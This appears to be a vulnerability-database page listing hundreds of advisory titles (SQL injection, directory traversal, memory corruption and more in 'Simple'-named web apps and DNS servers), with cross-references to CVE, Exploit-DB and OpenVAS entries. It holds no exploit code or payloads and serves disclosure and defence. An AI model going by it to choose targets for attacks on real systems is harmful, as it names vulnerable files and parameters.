tftp_request memory corruption [49604] Yellowswordfish Simple Forum on WordPress sf-profile.php sql injection [49462] Joshua Oliver Really Simple CMS 0.3a directory traversal [49359] Sansuart Free simple guestbook PHP script act.php privilege escalation [49190] ISC BIND up to 9.4.x db.c dns_db_findrdataset Configuration [49091] Supersimple Super Simple Blog Script 2.5.4 comments.php sql injection [49090] Supersimple Super Simple Blog Script 2.5.4 comments.php directory traversal [48325] Jan De Graaff Com Simpleboard up to 0.9 File Upload image_upload.php privilege escalation [47843] Simple Machines Forum up to 1.1.4 Load.php PHP sql injection [47589] Simple Machines Forum up to 1.1.6 index.php directory traversal [47588] Simple Machines Forum up to 1.1.6 index.php directory traversal [47587] Simple Machines Forum up to 1.1.6 index.php cross site request forgery [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47395] Simple Machines Forum 1.1.4 privilege escalation [47323] Juniper ScreenOS 6.0.0/6.1.0/6.2.0/6.3.0 DNS Lookup denial of service [47233] Drupal Plus1 up to 6.x-2.5 cross site request forgery [47070] Daniel J. Bernstein djbdns 1.05 response.c response_addname privilege escalation [46725] Simple-review Com Simple Review 1.3.5 index.php sql injection [46700] Cafuego Simple Document Management System 1.1.5 login.php sql injection [46681] Cafuego Simple Document Management System 1.1.5 login.php sql injection [46662] Dminnich Simple PHP News 1.0 post.php privilege escalation [46637] Microsoft Windows DNS Server denial of service [46612] D.j.bernstein djbdns 1.05 race condition [46592] Dminnich Simple PHP News 1.0 post.php privilege escalation [46342] .matteoiammarrone Iamma Simple Gallery 1.0 File Upload privilege escalation [46172] Quirm Simple PHP Newsletter 1.5 mail.php directory traversal [45542] CMS Made Simple 1.4.1 directory traversal [45498] Drennansoft My Simple Forum 4.1 index.php directory traversal [45345] PowerDNS up to 2.9.21.1 Configuration [45261] LoveCMS The Simple Forum 3.1d index.php privilege escalation [45005] Pre Simple CMS loginsucess.php sql injection [45000] Simple RSS Reader 1.0 on Joomla admin.rssreader.php privilege escalation [44873] Linux Kernel 2.6.23 hfsplus_find_cat memory corruption [44783] Simple PHP Scripts gallery 0.1/0.3/0.4 index.php cross site scripting [44782] Simple PHP Scripts blog 0.3 complete.php cross site scripting [44745] PHP-Nuke DownloadsPlus module File Upload htm privilege escalation [44627] TYPO3 simplesurvey up to 1.7.0 sql injection [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44163] pdnsd up to 1.2.6-par p_exec_query denial of service [44091] Debian python-dns up to 2.3.1-4 Python Configuration [44081] Debian python-dns up to 2.3.1-3 Python Configuration [43957] Microsoft Office 2003/2007/Xp gdiplus.dll Numeric Error [43956] Microsoft Office 2003/2007/Xp gdiplus.dll memory corruption [43955] Microsoft Office 2003/2007/Xp gdiplus.dll denial of service [43588] PowerDNS Authoritative Server up to 2.9.20 DNS Cache privilege escalation [43508] WinZip 7.0/8.0/8.1/9.0/10.0 DNS Cache privilege escalation [43506] Sun Java 1.6.0 DNS Cache privilege escalation [43504] Apple Mac OS X 10.4 DNS Cache privilege escalation [43503] OpenOffice 1.1.5/2.0/2.0.2/2.0.3/2.0.4 DNS Cache privilege escalation [43410] The Kelleys dnsmasq 2.43 denial of service [43290] PowerDNS Recursor up to 3.1.5 Random Number Generator Numeric Error [43287] Thekelleys dnsmasq 2.25 privilege escalation [43159] Simple Machines OpenCart 0.7.7 index.php cross site scripting [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [43101] Simple Machines Forum 1.0.12/1.1.4 cross site scripting [43100] Simple Machines Forum 1.0.12/1.1.4 Random Number Generator Numeric Error [43058] Simple PHP Agenda up to 2.1.0 index.php directory traversal [42740] Fujitsu Interstage Application Server Plus up to V7.0.1 privilege escalation [42686] Simple Shop Galore up to 3.4 on Joomla index.php sql injection [42412] CMS Made Simple up to 1.2.4 javaupload.php privilege escalation [41869] Ventrian Simple Gallery 2.2 gallery.php cross site scripting [41818] PowerDNS Recursor 3.1.4 DNS Cache Numeric Error [41816] Raven Php Scripts Keep It Simple Guest Book up to 5.1.1 view_private.php directory traversal [41411] ZyXEL P-660HW DNS Server cross site request forgery [41281] Mamboportal.com Simpleboard 1.0.3 Stable index.php sql injection [41199] Tor World Simple Vote up to 1.1 diary.cgi cross site scripting [41125] Simple CMS up to 1.0.3 indexen.php sql injection [40948] Print Manager Plus Client Billing/Authentication 7.0.127.16 pqcore.exe memory corruption [40895] Simple OS CMS 0.1c Beta Login login.php sql injection [40796] Gerd Tentler Simple Forum 3.2 thumbnail.php directory traversal [40795] Gerd Tentler Simple Forum 3.2 forum.php cross site scripting [40367] CMS Made Simple up to 1.2.2 content_css.php sql injection [40322] simpleforum 4.6.2 simpleforum.cgi cross site scripting [40156] PHP Real Estate Classifieds Php Real Estate Classifieds Premium Plus fullnews.php sql injection [40153] Anon Proxy Server 0.100 diagdns.php privilege escalation [40017] Sergey Lyubka Simple HTTPD 1.3 aux privilege escalation [39860] SimpleGallery 0.1.3 index.php cross site scripting [39669] Really Simple CalDAV Store up to 0.9.0 information disclosure [39661] Simple Machines Forum 1.1.4 Search Module Configuration [39413] Simple Machines Forum 1.0.11/1.1.3 sql injection [39370] David Hansson Ruby on Rails up to 1.2.2 xml::simple) information disclosure [39352] Simple PHP Forum 0.6.1 cross site scripting [39254] CMS Made Simple 1.1.3.1 information disclosure [39253] CMS Made Simple 1.1.3.1 cross site scripting [39252] CMS Made Simple 1.1.3.1 privilege escalation [39251] CMS Made Simple 1.1.3.1 Administrative privilege escalation [38967] phpBB phpBB Plus up to 1.52 lang_admin_album.php privilege escalation [38949] Alexander Palmo Simple PHP Blog up to 0.5.0.0 user_style.php cross site scripting [38948] Alexander Palmo Simple PHP Blog up to 0.5.0.0 htaccess upload_img_cgi.php Configuration [38935] CMS Made Simple up to 1.42 adodb-perf-module.inc.php privilege escalation [38880] Phpbb2 Phpbb2 Plus up to 1.x lang_main_album.php privilege escalation [38739] ISC BIND 8.4.7 DNS Cache unknown vulnerability [38064] 8pixel.net Simple Blog 3.0 comments_get.asp sql injection [37943] Simple Machines Forum 1.1.3 index.php directory traversal [37916] Insanely Simple Blog up to 0.5 index.php sql injection [37915] Insanely Simple Blog up to 0.5 index.php cross site scripting [37471] Sergey Lyubka Simple HTTPD 1.38 information disclosure [37374] Simple Machines Forum 1.1.2 unknown vulnerability [37373] Simple Machines Forum 1.1.2 privilege escalation [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [36805] Simple Php Scripts Gallery 0.3 index.php file_exists privilege escalation [36658] Simple Machines Forum 1.1.2 weak authentication [36583] CMS Made Simple up to 1.0.5 stylesheet.php sql injection [36125] Really Simple PHP/Ajax privilege escalation [36006] dproxy Nexgen dns_decode.c dns_decode_reverse_name memory corruption [35996] Really Simple PHP/Ajax 2007-03-23 controller_v4.php directory traversal [35293] Cromosoft Simple Plantilla PHP File Upload privilege escalation [35292] Cromosoft Simple Plantilla PHP list_main_pages.php directory traversal [35277] Simple PHP Forum up to 0.3 logon_user.php sql injection [35244] XeroXer Simple one-file gallery 0.6 gallery.php cross site scripting [35243] XeroXer Simple one-file gallery 0.6 gallery.php directory traversal [35030] Simple Machines Forum 1.0.7/1.1 Rc2 querystring.php weak authentication [34990] MediaWiki up to 1.9.1 Error Message simple.deps.php information disclosure [34957] PhpMyChat Plus up to 1.9 avatar.php directory traversal [34734] CMS Made Simple 2.7 cross site scripting [34680] CMS Made Simple 2.7 cmsimple/cms.php privilege escalation [34546] Simple Machines Forum 1.1 index.php cross site scripting [34467] wcSimple Poll information disclosure [34259] Cms-center Simple Web Cms page.php sql injection [34150] CMS Made Simple 1.0.2 index.php cross site scripting [34149] CMS Made Simple 1.0.2 cross site scripting [33610] Paul Griffin Simple PHP Gallery 1.1 Error Message sp_index.php information disclosure [33609] Paul Griffin Simple PHP Gallery 1.1 sp_index.php cross site scripting [33530] 8pixel.net Simple Blog up to 3.0 unknown vulnerability [33529] 8pixel.net Simple Blog up to 2.3 sql injection [33264] Hawking Technology Wr254-ca Wireless Router DNS Server denial of service [33260] Phpheaven PhpMyChat Plus up to 1.9 Help avatar.php directory traversal [33244] PowerDNS Recursor up to 3.1.3 denial of service [33237] PowerDNS Recursor up to 3.1.3 memory corruption [33213] SimpleChat 1.0.0 chat_panel.php memory corruption [33181] The Web Drivers Simple Forum message_details.php sql injection [32942] Simple Machines Forum up to 1.1 Rc3 index.php cross site scripting [32941] Simple Machines Forum 1.1 Rc2 index.php cross site scripting [32868] McAfee Personal Firewall Plus 1.0.178.0 mcnasvc.exe denial of service [32841] Phpbb Plusxl PlusXL 20.272 privilege escalation [32669] Sergey Lyubka Simple HTTPD 1.34 memory corruption [32398] Simple Discussion Board 0.1.0 blank.php privilege escalation [32120] 8pixel.net Simple Blog up to 2.3 default.asp sql injection [32028] Simple Machines Forum 1.0.7/1.1 Rc2 directory traversal [31919] 8pixel.net Simple Blog up to 2.0 comments.asp sql injection [31736] Microsoft Windows XP gdiplus.dll denial of service [31722] Turnkey Web Tools PHP Simple Shop up to 2.0 admin/index.php privilege escalation [31255] Mamboxchange Simpleboard 1.1.0 image_upload.php privilege escalation [30632] Two Shoes Mambo Factory SimpleBoard 1.1.0 Stable Administration cross site scripting [30090] CodeMunkyX Simple Poll 1.0 admin unknown vulnerability [29982] SWS Sws Simple Web Server 0.1.7 syslog memory corruption [29981] SWS Sws Simple Web Server 0.1.7 memory corruption [29949] pdnsd up to 1.2.3 Par memory corruption [29948] pdnsd up to 1.2.3 Par denial of service [29942] PowerDNS 3.0 denial of service [29890] Dnsmasq 2.29 DHCP Client denial of service [29245] Himpfen Consulting PHP SimpleNEWS 1.0.0 admin.php sql injection [29217] Alexander Palmo Simple PHP Blog 0.4.0/0.4.5/0.4.6/0.4.7/0.4.7.1 install05.php directory traversal [28906] Simple Machines Forum 1.0.6 sources/register.php cross site scripting [28333] 8pixel.net Simple Blog 2.1 index.php sql injection [28332] 8pixel.net Simple Blog 2.1 comments.asp cross site scripting [28225] Enhanced Simple PHP Gallery 1.7 Error Message sp_helper_functions.php information disclosure [28224] Enhanced Simple PHP Gallery 1.7 index.php cross site scripting [27990] CityPost Simple PHP Upload 5.3 simple-upload-53.php cross site scripting [27825] PowerDNS up to 2.9.16 DNS Implementation denial of service [27412] Simple Machines Forum 1.1 Rc1 memberlist.php sql injection [27150] Cafuego Simple Document Management System up to 2.0-cvs list.php sql injection [27021] SimplePoll results.php sql injection [27003] Zyxel Prestige 2000w V.1voip Wi-fi Phone wj.00.10 DNS Server denial of service [26817] Alexander Palmo Simple PHP Blog up to 0.4.5 preview_cgi.php cross site scripting [26560] Oracle Database Server 9.0.2.4 ISQLPlus cross site scripting [26437] CMS Made Simple 0.10 index.php cross site scripting [26252] CMS Made Simple up to 0.10 lang.php privilege escalation [26239] Simple Machines Forum 1.0.5 information disclosure [26212] Alexander Palmo Simple PHP Blog 0.4.0 comment_delete_cgi.php privilege escalation [26192] simpleproxy 2.2b/3.0/3.1/3.2 memory corruption [26181] Alexander Palmo Simple PHP Blog 0.4.0 upload_img_cgi.php memory corruption [25878] CMS Made Simple up to 2.4 index.php search cross site scripting [25827] PowerDNS up to 2.9.17 denial of service [25722] Alexander Palmo Simple Php Blog 0.4.0 config/password.txt unknown vulnerability [25302] PostNuke 0.750/0.760 Rc2/0.760 Rc3 Error Message simple_smarty.php information disclosure [25140] Dan Bernstein qmail stralloc_readyplus Integer Coercion Error [24898] PMSoftware Simple Web Server 1.0 memory corruption [24877] Alexander Palmo Simple PHP Blog 0.4.0 Error Message sb_functions.php information disclosure [24876] Alexander Palmo Simple PHP Blog 0.4.0 search.php cross site scripting [24860] PhpBB Plus up to 1.52 groupcp.php cross site scripting [24847] PopUp Plus plugin for Miranda IM 2.0.3.8 memory corruption [24695] Dnsmasq up to 2.20 DNS Cache memory corruption [24694] Dnsmasq up to 2.20 DHCP memory corruption [24456] PowerDNS 2.0 Rc1/2.8/2.9.15 dnspacket.cc dnspacket::expand denial of service [24344] Alexander Palmo Simple PHP Blog 0.3.7c directory traversal [23367] Kerio Winroute Firewall up to 6.0.8 DNS Cache denial of service [67747] Cisco ASA 9.0/9.1/9.2 DNS Inspection Engine denial of service [67693] Cisco IOS/IOS XE Multicast DNS Gateway privilege escalation [67692] Cisco IOS/IOS XE Multicast DNS Gateway privilege escalation [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption [67396] PHP 5.3/5.4.0 DNS TXT Record dns_get_record memory corruption [21999] Oracle E-Business Suite 11.5.7 ISQLPlus load.uix privilege escalation [21299] Smart IRC Daemon 0.4.0 Reverse DNS Lookup memory corruption [20917] Telcondex Simplewebserver 2.12.30210 Build3285 Header memory corruption [20871] Sendmail up to 8.12.8-4 DNS Mapper denial of service [20711] SGI IRIX up to 6.5.20m DNS Callback weak authentication [20214] Microsoft ISA Server 2000 DNS Intrusion Detection Application Filter denial of service [20012] SWS Simple Web Server 0.0.3/0.0.4/0.1.0 URL denial of service [19997] Netgear FM114P 1.3 DynDNS Account Password privilege escalation [19853] ISC BIND up to 8.3.4 DNS Cache unknown vulnerability [19549] Telcondex SimpleWebServer 2.06.20817 GET Request denial of service [19512] SWS Simple Web Server up to 0.1.0 recv privilege escalation [19508] SWS Simple Web Server up to 0.1.0 404 Error Message denial of service [19506] SWS Simple Web Server up to 0.1.0 HTTP Request directory traversal [19441] MidiCart PHP/PHP Plus/PHP Maxi privilege escalation [19149] Oracle9i up to Release 2 9.2.2 iSQL Plus Web Application memory corruption [19140] Peter Sandvik Simple Web Server up to 0.5.1 HTTP Request privilege escalation [18711] Padl Software nss_ldap 198 DNS SRV memory corruption [18606] ISC BIND 4.9.8 DNS Resolver getnetbyname/getnetbyaddr memory corruption [18519] ARSC Really Simple Chat up to 1.0.1 Error Message home.php Path information disclosure [18403] ISC BIND 9.4.0 DNS Resolver libc/glibc/libbind memory corruption [18344] XChat 1.89 DNS Command privilege escalation [18252] Ethereal 0.9.0/0.9.1/0.9.2/0.9.3 DNS Dissector denial of service [18249] ISC BIND up to 9.2 DNS Packet message.c dns_message_findtype denial of service [18043] Squid Proxy up to 2.4/2.5/2.6 DNS Response memory corruption [17819] ProFTPD up to 1.2.2 Rc2 Reverse DNS Entry privilege escalation [17808] Open Projects Network IRCd U2.10.05.18 DNS Lookup weak authentication [17697] Ibill Internet Billing Company Processing Plus Management System ibillpm.pl weak authentication [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17037] Project Purple AutoDNS 0.0.4 Domain Name autodns.pl unknown vulnerability [16391] Igor Khasilev Oops Proxy Server 1.4.6 Reverse DNS Entry memory corruption [16086] FreeBSD 4.0/4.1/4.1.1 DNS getnameinfo denial of service [14674] tcpdump/Ethereal DNS Decoder denial of service [14250] SSH Client 1.2.26 DNS Hostname memory corruption [14107] ISC BIND 4.9/8 DNS Message denial of service [13927] ISC BIND 9.4.0 DNS Record privilege escalation [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13786] IBM AIX 3.2/4.1/4.2 DNS Hostname gethostbyname memory corruption [13586] PHP 5.6.0 DNS TXT Record Parser ext/standard/dns.c dns_get_record memory corruption [13581] ISC BIND 9.10.0 EDNS Option privilege escalation [13482] Joomla CMS com_simpledownload directory traversal [13391] Samba up to 4.0.17 DNS Reply Flag privilege escalation [13376] cPanel 11.40.1.13/11.42.1.15/11.43.0.11 DNS Clustering ACL privilege escalation [13375] cPanel 11.40.1.13/11.42.1.15/11.43.0.11 DNS Clustering Commands privilege escalation [13184] ISC BIND 9.8.1-P1 Smoothed Round Trip Time Algorithm DNS weak authentication [13122] Cisco TelePresence TC/TE DNS memory corruption [12797] cPanel 11.38.2/11.40.1/11.42.0 DNS Zone Editor information disclosure [12702] Cisco IOS up to 15.4 DNS ALG privilege escalation [12614] lighttpd 1.4.34 mod_evhost/mod_simple_vhost directory traversal [12282] cPanel 11.36.2.9/11.38.2.12/11.40.0.28/11.40.1.2 DNS Cluster privilege escalation [12089] Microsoft Bing 4.2.0 on Android DNS Response APK File Installation privilege escalation [11968] IBM WebSphere Application Server up to 7.0.0.30 simpleFileServlet information disclosure [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3 NSEC3-Signed Zones memory corruption [11667] Tor 0.2.4.15-rc DNS Reply dns.c cached_resolve_add_answer denial of service [11664] Tor 0.2.4.11-alpha ClientDNSRejectInternalAddresses Rule privilege escalation [11620] cPanel WHM 11.36.2.9/11.38.2.12/11.40.0.28/11.40.1.2 Edit DNS Zone Interface cross site scripting [11375] David Heinemeier Hansson Ruby on Rails 4.0.0/4.0.1 simple_format helper cross site scripting [11342] Cisco ASA up to 9.1.3 DNS Error Response privilege escalation [10659] Cisco ASA up to 9.1(1.7) DNS Application Layer Protocol Inspection Engine memory corruption [9526] Squid Proxy up to 3.3.6 dns_internal.cc idnsALookup memory corruption [8230] Cisco ASA 9.0 DNS Inspection Engine denial of service [8133] ISC DHCP up to 4.2.5 Regular Expression libdns memory corruption [7845] Cisco Wireless LAN Controller 7.4.1.54 mDNS Packet memory corruption [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism privilege escalation [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt memory corruption [6102] Tor 0.2.2.37 dns.c denial of service [5572] Python up to 2.7.2 SimpleHTTPServer Module SimpleHTTPServer.py list_directory cross site scripting [5483] ISC BIND up to 9.9.1 DNS Resource Record Numeric Error [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4597] Apache Struts 1.3.10 processSimple.do cross site scripting [4435] Squid Proxy up to 3.1.15 DNS Reply denial of service [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4338] Microsoft Windows DNS privilege escalation [4305] ISC BIND 9.7.1/9.7.1b1/9.7.2 IXFR/DDNS Update denial of service [4148] ISC BIND 9.7.1/9.7.1-p1 DNSSEC Lookaside Validation Data Processing Error [3939] Microsoft Windows 2000 DNS privilege escalation [3031] Oracle Database 10.2.1/10.2.2/10.2.3 Simple Sharing unknown vulnerability [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [1987] AOL Instant Messenger 8.0/8.0 Plus/9.0 Classic YGPPicFinder.DLL memory corruption [1521] Cisco IP Phone 7912 DNS Packet Compression denial of service [1520] Cisco IP Phone 7905 DNS Packet Compression denial of service [1519] Cisco IP Phone 7902 DNS Packet Compression containing denial of service [1471] Squid Proxy up to 2.5.STABLE9 DNS Lookup weak authentication [1158] ISC BIND 9.3.0 DNSSEC authvalidated denial of service [981] Microsoft Proxy Server/ISA Server up to 2000 DNS Revese Lookup Cache weak authentication [934] Protector Plus Antivirus Software 2000 MS DOS Device Name privilege escalation [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [799] Sun MySQL 3.23.49/4.0.21 Reverse DNS mysql_real_connect memory corruption [717] Symantec Enterprise Firewall 7.x/8.x DNS Cache weak authentication [639] IBM AIX 4.3.3/5.1/5.2 dig dns_name_fromtext memory corruption MITRE CVE - https://cve.mitre.org: [CVE-2008-3208] Simple DNS Plus 4.1, 5.0, and possibly other versions before 5.1.101 allows remote attackers to cause a denial of service via multiple DNS reply packets. [CVE-2011-1131] The PlushSearch2 function in Search.php in Simple Machines Forum (SMF) before 1.1.13, and 2.x before 2.0 RC5, uses certain cached data in a situation where a temporary table has been created, even though this cached data is intended only for situations where a temporary table has not been created, which might allow remote attackers to obtain sensitive information via a search. [CVE-2008-3910] dns2tcp before 0.4.1 does not properly handle negative values in a certain length field in the input argument to the (1) dns_simple_decode or (2) dns_decode function, which allows remote attackers to overwrite a buffer and have unspecified other impact. [CVE-2008-3433] SpeedBit Download Accelerator Plus (DAP) before 8.6.3.9 does not properly verify the authenticity of updates, which allows man-in-the-middle attackers to execute arbitrary code via a Trojan horse update, as demonstrated by evilgrade and DNS cache poisoning. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. SecurityFocus - https://www.securityfocus.com/bid/: [30207] Simple DNS Plus Unspecified Remote Denial of Service Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [43767] Simple DNS Plus unspecified denial of service [68156] Simple Machines Forum PlushSearch2 information disclosure [44974] Dns2tcp dns_simple_decode() and dns_decode() buffer overflow Exploit-DB - https://www.exploit-db.com: [6059] Simple DNS Plus <= 5.0/4.1 - Remote Denial of Service Exploit OpenVAS (Nessus) - http://www.openvas.org: [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902757] Zoho ManageEngine ADSelfService Plus Cross Site Scripting Vulnerability [902608] A Really Simple Chat Multiple SQL Injection Vulnerabilities [902607] A Really Simple Chat Multiple XSS Vulnerabilities [902469] ManageEngine ServiceDesk Plus Multiple Stored XSS Vulnerabilities [902446] Simple Machines Forum Multiple Vulnerabilities [901177] CA Internet Security Suite Plus 'KmxSbx.sys' Buffer Overflow Vulnerability [901141] CMS Made Simple 'modules/Printing/output.php' Local File Include Vulnerability [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900544] Simple Machines Forum SQL Injection Vulnerability [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900349] CUPS HTTP Host Header DNS Rebinding Attacks [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900118] Simple Machines Forum Password Reset Vulnerability [900088] Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238) [900005] Vulnerabilities in DNS Could Allow Spoofing (953230) [880761] CentOS Update for dnsmasq CESA-2009:1238 centos5 i386 [870106] RedHat Update for dnsmasq RHSA-2008:0789-01 [864807] Fedora Update for dnsperf FEDORA-2012-15981 [864805] Fedora Update for dnsperf FEDORA-2012-15965 [864705] Fedora Update for dnsmasq FEDORA-2012-12598 [864062] Fedora Update for pdns FEDORA-2012-0263 [863853] Fedora Update for ldns FEDORA-2011-13895 [863719] Fedora Update for pdns FEDORA-2012-1207 [863598] Fedora Update for ldns FEDORA-2011-13929 [863597] Fedora Update for ldns FEDORA-2011-13915 [862830] Fedora Update for perl-CGI-Simple FEDORA-2011-0631 [862827] Fedora Update for perl-CGI-Simple FEDORA-2011-0653 [862712] Fedora Update for dnsperf FEDORA-2010-18521 [862655] Fedora Update for dnsperf FEDORA-2010-15461 [862611] Fedora Update for libgdiplus FEDORA-2010-13676 [862394] Fedora Update for libgdiplus FEDORA-2010-13695 [862382] Fedora Update for libgdiplus FEDORA-2010-13698 [862252] Fedora Update for libgdiplus FEDORA-2010-10332 [861603] Fedora Update for pdns-recursor FEDORA-2010-0209 [861600] Fedora Update for pdns-recursor FEDORA-2010-0228 [861366] Fedora Update for perl-Net-DNS FEDORA-2007-0668 [861344] Fedora Update for perl-Net-DNS FEDORA-2007-609 [861176] Fedora Update for perl-Net-DNS FEDORA-2007-612 [860816] Fedora Update for dnssec-tools FEDORA-2008-1771 [860546] Fedora Update for pdns FEDORA-2008-7048 [860527] Fedora Update for dnssec-tools FEDORA-2008-1758 [860381] Fedora Update for pdns-recursor FEDORA-2008-3036 [860380] Fedora Update for pdns-recursor FEDORA-2008-3010 [860161] Fedora Update for pdns FEDORA-2008-7083 [860055] Fedora Update for pdns-recursor FEDORA-2008-6893 [840510] Ubuntu Update for libgdiplus vulnerability USN-993-1 [840316] Ubuntu Update for libnet-dns-perl vulnerability USN-594-1 [840230] Ubuntu Update for dnsmasq vulnerability USN-627-1 [840172] Ubuntu Update for libnet-dns-perl vulnerabilities USN-483-1 [835256] HP-UX Update for NFS/ONCplus HPSBUX02653 [835250] HP-UX Update for NFS/ONCplus HPSBUX02375 [835232] HP-UX Update for ONCPlus HPSBUX02523 [835226] HP-UX Update for NFS/ONCplus HPSBUX02509 [835201] HP-UX Update for NFS/ONCplus HPSBUX02440 [835165] HP-UX Update for NFS/ONCplus HPSBUX02375 [835151] HP-UX Update for DNS and Resolver Libraries HPSBUX00209 [831286] Mandriva Update for perl-CGI-Simple MDVSA-2010:252 (perl-CGI-Simple) [831281] Mandriva Update for perl-CGI-Simple MDVSA-2010:250 (perl-CGI-Simple) [831141] Mandriva Update for libgdiplus MDVSA-2010:166 (libgdiplus) [830757] Mandriva Update for perl-Net-DNS MDVSA-2008:073 (perl-Net-DNS) [830022] Mandriva Update for perl-Net-DNS MDKSA-2007:146 (perl-Net-DNS) [803073] Simple Invoices Multple Cross Site Scripting Vulnerabilities [802916] Simple Web Server Connection Header Buffer Overflow Vulnerability [802839] Zoho ManageEngine Support Center Plus Multiple Fields XSS Vulnerabilities [802589] SimpleGroupware 'export' Parameter Cross Site Scripting Vulnerability [802587] Zoho ManageEngine ADManager Plus Multiple Cross Site Scripting Vulnerabilities [802560] Joomla Simple File Upload Module Remote Code Execution Vulnerability [802483] Zoho ManageEngine Security Manager Plus Multiple Vulnerabilities [802477] Zoho ManageEngine Support Center Plus Multiple Vulnerabilities [802334] Simple Machines Forum Session Hijacking Vulnerability [801984] ManageEngine ServiceDesk Plus Authentication Bypass Vulnerability [801983] ManageEngine ServiceDesk Plus 'searchText' XSS Vulnerability [801962] ManageEngine ServiceDesk Plus Multiple XSS Vulnerabilities [801936] MyChat Plus Multiple Vulnerabilities [801753] Topaz Systems SigPlus Pro ActiveX Control Multiple Vulnerabilities [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801551] GetSimple CMS Administrative Credentials Disclosure Vulnerability [801550] GetSimple CMS version detection [801462] Lhaplus Untrusted search path Vulnerability [801416] SimpleID 'index.php' Cross Site Scripting Vulnerability [801415] SimpleID Version Detection [801410] GetSimple CMS Multiple Vulnerabilities [801252] SigPlus Pro ActiveX Control 'LCDWriteString()' Buffer Overflow Vulnerability [801251] SigPlus Pro ActiveX Version Detection [801212] Simple Search 'terms' Cross-Site Scripting Vulnerability [800840] Tor 'relay.c' DNS Spoofing Vulnerability - July09 (Linux) [800838] Tor 'relay.c' DNS Spoofing Vulnerability - July09 (Win) [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800558] Simple Machines Forum Multiple Vulnerabilities [800557] Simple Machines Forum Version Detection [800456] Mozilla Products Necko DNS Information Disclosure Vulnerability (Linux) [800455] Mozilla Products Necko DNS Information Disclosure Vulnerability (Win) [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800186] Simple Management BIND Admin Login Page SQL Injection Vulnerability [103383] PowerDNS Authoritative Server Remote Denial of Service Vulnerability [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [103332] CMS Made Simple Remote Database Corruption Vulnerability [103184] ManageEngine ServiceDesk Plus 'FILENAME' Parameter Directory Traversal Vulnerability [103183] ManageEngine ServiceDesk Plus Detection [103174] Simple web-server Directory Traversal Vulnerability [103170] Unbound DNS Resolver Remote Denial of Service Vulnerability [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability [100950] Microsoft DNS server internal hostname disclosure detection [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability [100774] Squid 'DNS' Reply Remote Buffer Overflow Vulnerability [100716] CMS Made Simple 'default_cms_lang' Parameter Local File Include Vulnerability [100632] CMS Made Simple 'admin/editprefs.php' Cross-Site Scripting Vulnerability [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100498] CMS Made Simple Local File Include and Cross Site Scripting Vulnerabilities [100497] CMS Made Simple Detection [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability [100433] PowerDNS multiple vulnerabilities January 2010 [100432] PowerDNS Detection [100417] Unbound DNS resolver Detection [100416] Unbound DNS Server NSEC3 Signature Verification DNS Spoofing Vulnerability [100371] Simple Machines Forum Multiple Security Vulnerabilities [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability [100270] SIDVault 'simple_bind()' Function Multiple Remote Buffer Overflow Vulnerabilities [100182] GScripts.net DNS Tools 'dig.php' Remote Command Execution Vulnerability [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80112] Simple TCP portscan in NASL [71179] Gentoo Security Advisory GLSA 201202-04 (pdns) [71178] Gentoo Security Advisory GLSA 201202-03 (maradns) [70806] Gentoo Security Advisory GLSA 201201-05 (mDNSResponder) [70795] Gentoo Security Advisory GLSA 201111-06 (MaraDNS) [70758] FreeBSD Ports: powerdns, powerdns-devel [70705] Debian Security Advisory DSA 2387-1 (simplesamlphp) [70704] Debian Security Advisory DSA 2385-1 (pdns) [70567] Debian Security Advisory DSA 2353-1 (ldns) [70545] Debian Security Advisory DSA 2330-1 (simplesamlphp) [69332] Debian Security Advisory DSA 2196-1 (maradns) [68957] FreeBSD Ports: maradns 